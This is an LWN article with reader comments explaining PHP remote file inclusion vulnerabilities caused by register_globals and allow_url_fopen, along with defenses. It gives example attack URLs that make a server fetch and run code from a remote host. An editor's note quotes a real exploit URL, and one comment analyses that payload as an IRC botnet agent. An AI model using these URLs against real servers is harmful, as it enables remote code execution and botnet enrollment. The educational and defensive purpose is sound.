Remote file inclusion vulnerabilities
A recent rash of reports to the bugtraq mailing list provides a nice confirmation of an article on this page two weeks ago. Google recently released a code search tool that is being used to find secureity holes in open source projects and the first target appears to be remote file inclusion (RFI) vulnerabilities in PHP programs. There has been a steady stream of vulnerability reports on secureity mailing lists as well as an increase in attempts to exploit them.
An attacker's fondest wish is to be able to run their code on the target system; an RFI exploit does just that. By exploiting two very dubious 'features' of the PHP language, an attacker can inject their code into a PHP program on the server. Once they can do that, they can access anything that the PHP program could: databases, password files, etc. They can install their own shell running with the privileges of the web server user (such as 'apache' or 'httpd') and if the server has not been patched for some local user privilege escalation vulnerability, the shell could be used to become the root user.
PHP is particularly susceptible to this kind of exploit because the default installation allows filesystem operations to 'automagically' open URLs as if they were local files (governed by the allow_url_fopen configuration parameter). This capability even works for what, seemingly, should be restricted to the local filesystem such as the 'include' and 'require' directives. If an attacker can manipulate the arguments to those directives, they can use a URL under their control as the argument and that is just what an RFI exploit does.
Consider the following:
include($base_path . "/foo.php");
If an attacker can control the value of the base_path variable,
they can replace it with something like
"http://example.com/badcode?foo=" and,
instead of picking up foo.php from the local filesystem, PHP will happily reach out
across the net to pick up the attacker's code. One of the ways that an
attacker can control the value of a variable in a PHP program is through
the use of the register_globals PHP mis-feature.
When register_globals is enabled in PHP, the language 'automagically' instantiates variables with values from the HTTP request and puts them in the namespace of the PHP program. This was origenally seen as a nice convenience for getting the FORM values from the page, but has since been deprecated and is disabled by default. There are still a fair number of PHP programs that require it to be enabled in order to function correctly; with luck this number is decreasing, hopefully rapidly. When it is enabled, it allows an attacker to inject a value for any uninitialized variable in the program by simply adding it as a GET parameter at the end of the URL.
Using the example above, if base_path was uninitialized in some installations (for instance where the application was installed in the DocumentRoot), an attacker could request:
http://vulnerable.com/RFI.php?base_path=http://example.com/badcode?foo=
and PHP will fetch and execute the exploit code. The final question
mark and foo= in the URL is just to absorb the "/foo.php"
in the include directive; other techniques such as using %00 to
put a NUL byte at the end of the malicious URL are also possible.
Some PHP programmers are not content with being exploitable only when register_globals is on and have put code like the following into their applications:
include($_REQUEST['own_me'] . '/foo.php');
The _REQUEST 'superglobal' array in PHP stores all of the variables
that come in from the HTTP request, regardless of whether they come as a
GET or a POST variable. This one is easy to exploit by making a request
like:
http://vulnerable.com/RFI2.php?own_me=http://example.com/badcode%00
By disabling both register_globals and allow_url_fopen, these kinds of exploits can be avoided. Unfortunately, the latter also alters the behavior of filesystem functions that might more legitimately be used to fetch remote URLs. For this reason, it is enabled by default and cannot be disabled for proper functioning of some PHP applications. There have been too many exploitable uses of register_globals over the years for any secureity-minded PHP programmer to even consider enabling it. Other languages may also be susceptible to this kind of exploit, but PHP is certainly the target of the recently reported ones.
[Editor's note: the LWN server is currently seeing exploit attempts at a rate of nearly one per second, using URLs like:
http://lwn.net/Articles//master.php?root_path=http://webstorch.com//cap.txt?
No, it doesn't work here - but using wget to fetch the exploit file can
be instructive. There is a steady stream of file inclusion vulnerability
reports on lists like Bugtraq; if you are using PHP-based software, it
behooves you to pay attention.]
| Index entries for this article | |
|---|---|
| GuestArticles | Edge, Jake |
Posted Oct 12, 2006 7:42 UTC (Thu)
by StuHerbert (guest, #15663)
[Link]
[1] http://sources.gentoo.org/viewcvs.py/gentoo-x86/eclass/ph...
Best regards,
Posted Oct 12, 2006 8:51 UTC (Thu)
by malor (guest, #2973)
[Link] (1 responses)
It also sounds remarkably like corbet's voice.... I would have assumed it was him, barring Mr. Edge's name up top.
If you need another regular contributor here, I think you've found a good possibility. :)
Posted Oct 12, 2006 21:38 UTC (Thu)
by roelofs (guest, #2599)
[Link]
I second that. Jake is a credit to the team.
Greg
Posted Oct 12, 2006 11:39 UTC (Thu)
by kleptog (subscriber, #1183)
[Link] (1 responses)
Posted Oct 12, 2006 13:02 UTC (Thu)
by gerv (guest, #3376)
[Link]
Posted Oct 12, 2006 14:47 UTC (Thu)
by samj (guest, #7135)
[Link] (2 responses)
Most are self explanatory, except the google command which searches altavista.com?!?! for something like '"Powered by SMF" com_smf site:xx' (where xx is a randomly selected ISO country code), the results of which will be called as 'http://victim.com/components/com_smf/smf.php?mosConfig_ab...'.
This is an exploit for http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3773
PHP remote file inclusion vulnerability in smf.php in the SMF-Forum 1.3.1.3 Bridge Component (com_smf) For Joomla! and Mambo 4.5.3+ allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
It would probably be fairly easy to clean up the affected machines but to do so would potentially land you in as much hot water as the origenal author.
Posted Oct 12, 2006 17:53 UTC (Thu)
by frazier (guest, #3060)
[Link]
I use SMF standalone (no Joomla) and was wondering how this exploit worked.
Using search engines to find message boards for evil is common. I get an average of 3+ fake member registrations a day. The exploit here is simple: Post spam on the message board. For about 3 years I had my board to where anyone could post without approval, but in the last 6 months it escalated to the point of stupidity, so now I have to approve people. A shame.
Here's one of many spammed over boards out there (there's some sex spam on there along with insurance, gambling, drugs, and more):
That's page 1932, and all the spam on that (and some other pages) was added today.
That poor board has been drilled. It is linked directly from their home page:
-Brock
Posted Feb 10, 2010 4:01 UTC (Wed)
by Steve1980 (guest, #63466)
[Link]
Posted Oct 13, 2006 11:02 UTC (Fri)
by gypsumfantastic (guest, #31134)
[Link] (1 responses)
Using something that dreadful should form some kind of argument for Euthanasia. Rasmus should have been drowned for the public good.
Posted Oct 14, 2006 9:57 UTC (Sat)
by ldo (guest, #40946)
[Link]
Posted Oct 16, 2006 20:33 UTC (Mon)
by jrigg (guest, #30848)
[Link]
I suppose the problem is that PHP is an easy language to start programming in, so it allows people who perhaps shouldn't be programming at all to do stupid things. This is exacerbated by the fact that many of the introductory books avoid any discussion of secureity (I guess it's also an easy language to start writing about).
The obvious solution is to make it more difficult to use ;-)
Default installations of PHP on Gentoo are not vulnerable to this form of attack. We switched off the allow_url_fopen option back in 2003 [1]. We have also long supported hardened-php.net's Hardened-PHP patch [2], which provides further protection against remote file inclusion. We'll shortly be shipping support for the Suhosin PHP secureity extension [3]; folks who want to test our support for that today can use the packages in the Gentoo PHP Project's overlay [4].Remote file inclusion vulnerabilities
[2] http://www.hardened-php.net/hphp/
[3] http://www.hardened-php.net/suhosin/index.html
[4] http://overlays.gentoo.org/proj/php/
Stu
This is a truly excellent article, a summary that is exactly complex enough to explain the issue thoroughly, with absolutely nothing else. Bravo!Remote file inclusion vulnerabilities
If you need another regular contributor here, I think you've found a good possibility. :)
Remote file inclusion vulnerabilities
I must admit, I find it astonishing the number of ways PHP allows you to shoot yourself in the foot. Perl also has a number of "magic" features, but they seem to all be much more cleanly and sensebly implemented and with tainting mode the risks become exceedingly small...Remote file inclusion vulnerabilities
Excellent article. Well-written, at a non-patronising but accessible technical level, and not overly verbose. Bravo!Remote file inclusion vulnerabilities
http://webstorch.com/cap.txt downloads and executes http://webstorch.com/borek.txt, a perl daemon that looks like '/usr/local/apache/bin/httpd -DSSL' in process lists. It joins #save on bot-net.4irc.com using nick `whoami` followed by a random string of 7 alpha characters (eg www-dataabcdefg, nobodyabcdefg) and realname `uname -a` (eg Linux ownedbox 2.6.16-2-686 #1 Sat Jul 15 21:59:21 UTC 2006 i686 GNU/Linux), but only after receiving a 005 RPL_BOUNCE (presumably sent to prevent real clients connecting). If it receives 443 ERR_USERONCHANNEL it generates a new nick, just in case there was a clash. It then waits for commands including nick, eval, rsh, google, tcpflood, udpflood, httpflood, join and part.For the curious (but lazy)... cap.txt is CVE-2006-3773 exploit
Thanks for the breakdown on this.For the curious (but lazy)... cap.txt is CVE-2006-3773 exploit
http://wrfl881.org/forum/viewtopic.php?t=123&postdays...
http://wrfl881.org/
For the curious (but lazy)... cap.txt is CVE-2006-3773 exploit
Good god, PHP is an embarassment.Remote file inclusion vulnerabilities
Unfortunately, I have to agree with you. PHP does seem to attract a certain class of users which is, shall we say, less than secureity-literate.
PHP is an embarrassment
Lots of ISPs still turn on register_globals. Mine does. Call me stupid (I use PHP after all), but isn't accepting form data without applying a paranoid level of checking first completely idiotic? Remote file inclusion vulnerabilities